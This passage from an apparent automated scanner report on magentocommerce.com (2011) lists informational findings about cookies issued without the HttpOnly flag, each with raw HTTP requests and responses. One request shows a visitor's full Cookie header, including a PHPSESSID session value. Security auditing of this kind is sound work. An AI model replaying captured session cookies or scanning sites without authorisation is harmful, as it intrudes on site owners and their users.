Set-Cookie: exp_last_activity=1313175837; expires=Sat, 11-Aug-2012 15:03:57 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fleadership%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:57 GMT
Content-Length: 51387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.28. http://www.magentocommerce.com/company/media  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/media

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/media HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175832; expires=Sat, 11-Aug-2012 15:03:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fcompany%2Fmedia%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:53 GMT
Content-Length: 42971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.29. http://www.magentocommerce.com/company/media/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/media/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/media/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175868; expires=Sat, 11-Aug-2012 15:04:28 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fcompany%2Fmedia%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:28 GMT
Content-Length: 42971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.30. http://www.magentocommerce.com/company/pci-compliance  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/pci-compliance

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/pci-compliance HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175798; expires=Sat, 11-Aug-2012 15:03:18 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fcompany%2Fpci-compliance%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:18 GMT
Content-Length: 35471

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.31. http://www.magentocommerce.com/company/press-releases  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/press-releases

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/press-releases HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175819; expires=Sat, 11-Aug-2012 15:03:40 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fcompany%2Fpress-releases%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:40 GMT
Content-Length: 41130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.32. http://www.magentocommerce.com/company/press-releases/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/press-releases/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/press-releases/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175845; expires=Sat, 11-Aug-2012 15:04:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fcompany%2Fpress-releases%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:05 GMT
Content-Length: 41130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.33. http://www.magentocommerce.com/company/privacy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/privacy

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/privacy HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175832; expires=Sat, 11-Aug-2012 15:03:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Fcompany%2Fprivacy%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:52 GMT
Content-Length: 49802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.34. http://www.magentocommerce.com/company/terms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/terms

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/terms HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175839; expires=Sat, 11-Aug-2012 15:03:59 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fcompany%2Fterms%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:59 GMT
Content-Length: 41069

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.35. http://www.magentocommerce.com/de  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /de

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /de HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176483; expires=Sat, 11-Aug-2012 15:14:43 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fde%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:44 GMT
Content-Length: 69992

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- me
...[SNIP]...
4.36. http://www.magentocommerce.com/demo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /demo

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /demo HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175788; expires=Sat, 11-Aug-2012 15:03:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fdemo%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:08 GMT
Content-Length: 39549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.37. http://www.magentocommerce.com/design_guide  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /design_guide

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /design_guide HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176273; expires=Sat, 11-Aug-2012 15:11:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fdesign_guide%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:13 GMT
Content-Length: 35263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.38. http://www.magentocommerce.com/dk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /dk

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dk HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176568; expires=Sat, 11-Aug-2012 15:16:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fdk%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:16:09 GMT
Content-Length: 39933

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.39. http://www.magentocommerce.com/download  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /download

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /download HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/product/emerging-business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170943; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A1%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A3%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.10.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:47:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171254; expires=Sat, 11-Aug-2012 13:47:34 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:47:34 GMT
Content-Length: 170988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.40. http://www.magentocommerce.com/download/diff  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /download/diff

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /download/diff HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176284; expires=Sat, 11-Aug-2012 15:11:24 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fdownload%2Fdiff%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:24 GMT
Content-Length: 70455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.41. http://www.magentocommerce.com/download/get-started  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /download/get-started

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /download/get-started HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176317; expires=Sat, 11-Aug-2012 15:11:57 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fdownload%2Fget-started%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Location: http://www.magentocommerce.com/download
Content-Length: 0

4.42. http://www.magentocommerce.com/download/login_form  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /download/login_form

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /download/login_form HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176319; expires=Sat, 11-Aug-2012 15:12:00 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fdownload%2Flogin_form%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:00 GMT
Content-Length: 5065

<div class="login-popup" id="registerWindow">
<div class="login-popup-cont">
<div class="col2-set">
<div class="col-1">
<h3>Login, it's Easy!</h3>

...[SNIP]...
4.43. http://www.magentocommerce.com/download/release_notes  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /download/release_notes

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /download/release_notes HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
